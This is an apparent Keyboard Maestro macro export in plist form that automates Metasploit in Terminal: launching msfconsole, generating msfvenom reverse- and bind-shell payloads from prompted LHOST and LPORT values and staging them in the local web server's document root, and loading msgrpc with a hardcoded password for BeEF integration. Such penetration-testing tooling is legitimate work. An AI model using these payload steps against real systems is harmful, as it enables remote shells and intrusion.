<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
	<dict>
		<key>Activate</key>
		<string>Normal</string>
		<key>CreationDate</key>
		<real>603248839.71637106</real>
		<key>CustomIconData</key>
		<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
		<key>Macros</key>
		<array>
			<dict>
				<key>Actions</key>
				<array>
					<dict>
						<key>Action</key>
						<string>ByPasting</string>
						<key>MacroActionType</key>
						<string>InsertText</string>
						<key>Text</key>
						<string>msfdb init &amp;&amp; msfconsole</string>
					</dict>
					<dict>
						<key>IsDisclosed</key>
						<false/>
						<key>KeyCode</key>
						<integer>36</integer>
						<key>MacroActionType</key>
						<string>SimulateKeystroke</string>
						<key>Modifiers</key>
						<integer>0</integer>
						<key>ReleaseAll</key>
						<false/>
						<key>TargetApplication</key>
						<dict/>
						<key>TargetingType</key>
						<string>Front</string>
					</dict>
				</array>
				<key>CreationDate</key>
				<real>603158737.91990697</real>
				<key>CustomIconData</key>
				<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
				<key>ModificationDate</key>
				<real>604530521.83623803</real>
				<key>Name</key>
				<string>Open metasploit</string>
				<key>Triggers</key>
				<array>
					<dict>
						<key>MacroTriggerType</key>
						<string>StatusMenu</string>
					</dict>
				</array>
				<key>UID</key>
				<string>5A71A45C-870B-4ED1-A4F2-A85F6B9BB0D7</string>
			</dict>
		</array>
		<key>Name</key>
		<string>Metasploit</string>
		<key>Targeting</key>
		<dict>
			<key>Targeting</key>
			<string>Included</string>
			<key>TargetingApps</key>
			<array>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.apple.Terminal</string>
					<key>Name</key>
					<string>Terminal</string>
					<key>NewFile</key>
					<string>/System/Applications/Utilities/Terminal.app</string>
				</dict>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.googlecode.iterm2</string>
					<key>Name</key>
					<string>iTerm</string>
					<key>NewFile</key>
					<string>/Applications/iTerm.app</string>
				</dict>
			</array>
		</dict>
		<key>ToggleMacroUID</key>
		<string>BD3A91E8-F9C6-479E-A719-8FFE5B74C03F</string>
		<key>UID</key>
		<string>B24AC723-6106-4902-8682-F49EDDB71CDD</string>
	</dict>
	<dict>
		<key>Activate</key>
		<string>Normal</string>
		<key>CreationDate</key>
		<real>603248839.71637106</real>
		<key>CustomIconData</key>
		<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
		<key>Macros</key>
		<array>
			<dict>
				<key>Actions</key>
				<array>
					<dict>
						<key>Buttons</key>
						<array>
							<dict>
								<key>Button</key>
								<string>OK</string>
							</dict>
							<dict>
								<key>Button</key>
								<string>Cancel</string>
								<key>Cancel</key>
								<true/>
							</dict>
						</array>
						<key>MacroActionType</key>
						<string>PromptForUserInput</string>
						<key>Prompt</key>
						<string>Please enter the details for these variables. (filename is optional)
</string>
						<key>TimeOutAbortsMacro</key>
						<true/>
						<key>Title</key>
						<string>Create payload</string>
						<key>Variables</key>
						<array>
							<dict>
								<key>Default</key>
								<string>%Variable%LHOST%</string>
								<key>Variable</key>
								<string>LHOST</string>
							</dict>
							<dict>
								<key>Default</key>
								<string>%Variable%LPORT%</string>
								<key>Variable</key>
								<string>LPORT</string>
							</dict>
							<dict>
								<key>Default</key>
								<string>cmd/unix/reverse_netcat|cmd/unix/reverse_bash|cmd/unix/reverse_python|cmd/unix/reverse_ruby|cmd/unix/bind_netcat|python/shell_bind_tcp|python/shell_reverse_tcp|python/meterpreter/reverse_tcp</string>
								<key>Variable</key>
								<string>Payload</string>
							</dict>
							<dict>
								<key>Default</key>
								<string>%Variable%Filename%</string>
								<key>Variable</key>
								<string>Filename</string>
							</dict>
						</array>
					</dict>
					<dict>
						<key>Conditions</key>
						<dict>
							<key>ConditionList</key>
							<array>
								<dict>
									<key>ConditionType</key>
									<string>Variable</string>
									<key>Variable</key>
									<string>Filename</string>
									<key>VariableConditionType</key>
									<string>IsEmpty</string>
									<key>VariableValue</key>
									<string>value</string>
								</dict>
							</array>
							<key>ConditionListMatch</key>
							<string>All</string>
						</dict>
						<key>ElseActions</key>
						<array>
							<dict>
								<key>Action</key>
								<string>ByPasting</string>
								<key>MacroActionType</key>
								<string>InsertText</string>
								<key>Text</key>
								<string>msfvenom -p %Variable%Payload% lhost=%Variable%LHOST% lport=%Variable%LPORT% &gt; /tmp/%Variable%Filename% &amp;&amp; sudo mv /tmp/%Variable%Filename% /Library/WebServer/Documents/%Variable%Filename% </string>
							</dict>
						</array>
						<key>MacroActionType</key>
						<string>IfThenElse</string>
						<key>ThenActions</key>
						<array>
							<dict>
								<key>Action</key>
								<string>ByPasting</string>
								<key>MacroActionType</key>
								<string>InsertText</string>
								<key>Text</key>
								<string>msfvenom -p %Variable%Payload% lhost=%Variable%LHOST% lport=%Variable%LPORT%</string>
							</dict>
						</array>
						<key>TimeOutAbortsMacro</key>
						<true/>
					</dict>
					<dict>
						<key>IsDisclosed</key>
						<false/>
						<key>KeyCode</key>
						<integer>36</integer>
						<key>MacroActionType</key>
						<string>SimulateKeystroke</string>
						<key>Modifiers</key>
						<integer>0</integer>
						<key>ReleaseAll</key>
						<false/>
						<key>TargetApplication</key>
						<dict/>
						<key>TargetingType</key>
						<string>Front</string>
					</dict>
				</array>
				<key>CreationDate</key>
				<real>603158737.91990697</real>
				<key>CustomIconData</key>
				<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
				<key>ModificationDate</key>
				<real>604517561.09793901</real>
				<key>Name</key>
				<string>Create Payload (metasploit)</string>
				<key>Triggers</key>
				<array>
					<dict>
						<key>MacroTriggerType</key>
						<string>StatusMenu</string>
					</dict>
				</array>
				<key>UID</key>
				<string>AFEA5F8A-5CAA-43A3-BEB0-E9D2BEC262F2</string>
			</dict>
		</array>
		<key>Name</key>
		<string>Metasploit</string>
		<key>Targeting</key>
		<dict>
			<key>Targeting</key>
			<string>Included</string>
			<key>TargetingApps</key>
			<array>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.apple.Terminal</string>
					<key>Name</key>
					<string>Terminal</string>
					<key>NewFile</key>
					<string>/System/Applications/Utilities/Terminal.app</string>
				</dict>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.googlecode.iterm2</string>
					<key>Name</key>
					<string>iTerm</string>
					<key>NewFile</key>
					<string>/Applications/iTerm.app</string>
				</dict>
			</array>
		</dict>
		<key>ToggleMacroUID</key>
		<string>BD3A91E8-F9C6-479E-A719-8FFE5B74C03F</string>
		<key>UID</key>
		<string>B24AC723-6106-4902-8682-F49EDDB71CDD</string>
	</dict>
	<dict>
		<key>Activate</key>
		<string>Normal</string>
		<key>CreationDate</key>
		<real>603248839.71637106</real>
		<key>CustomIconData</key>
		<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
		<key>Macros</key>
		<array>
			<dict>
				<key>Actions</key>
				<array>
					<dict>
						<key>Action</key>
						<string>ByPasting</string>
						<key>MacroActionType</key>
						<string>InsertText</string>
						<key>Text</key>
						<string>load msgrpc ServerHost=127.0.0.1 Pass=abc123 SSL=y</string>
					</dict>
					<dict>
						<key>IsDisclosed</key>
						<false/>
						<key>KeyCode</key>
						<integer>36</integer>
						<key>MacroActionType</key>
						<string>SimulateKeystroke</string>
						<key>Modifiers</key>
						<integer>0</integer>
						<key>ReleaseAll</key>
						<false/>
						<key>TargetApplication</key>
						<dict/>
						<key>TargetingType</key>
						<string>Front</string>
					</dict>
				</array>
				<key>CreationDate</key>
				<real>604345820.90336394</real>
				<key>CustomIconData</key>
				<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
				<key>ModificationDate</key>
				<real>604529118.67077398</real>
				<key>Name</key>
				<string>Beef integration (metasploit)</string>
				<key>Triggers</key>
				<array>
					<dict>
						<key>MacroTriggerType</key>
						<string>StatusMenu</string>
					</dict>
				</array>
				<key>UID</key>
				<string>4D1540A1-836A-4B71-AA1B-9693D44FF3B0</string>
			</dict>
		</array>
		<key>Name</key>
		<string>Metasploit</string>
		<key>Targeting</key>
		<dict>
			<key>Targeting</key>
			<string>Included</string>
			<key>TargetingApps</key>
			<array>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.apple.Terminal</string>
					<key>Name</key>
					<string>Terminal</string>
					<key>NewFile</key>
					<string>/System/Applications/Utilities/Terminal.app</string>
				</dict>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.googlecode.iterm2</string>
					<key>Name</key>
					<string>iTerm</string>
					<key>NewFile</key>
					<string>/Applications/iTerm.app</string>
				</dict>
			</array>
		</dict>
		<key>ToggleMacroUID</key>
		<string>BD3A91E8-F9C6-479E-A719-8FFE5B74C03F</string>
		<key>UID</key>
		<string>B24AC723-6106-4902-8682-F49EDDB71CDD</string>
	</dict>
</array>
</plist>
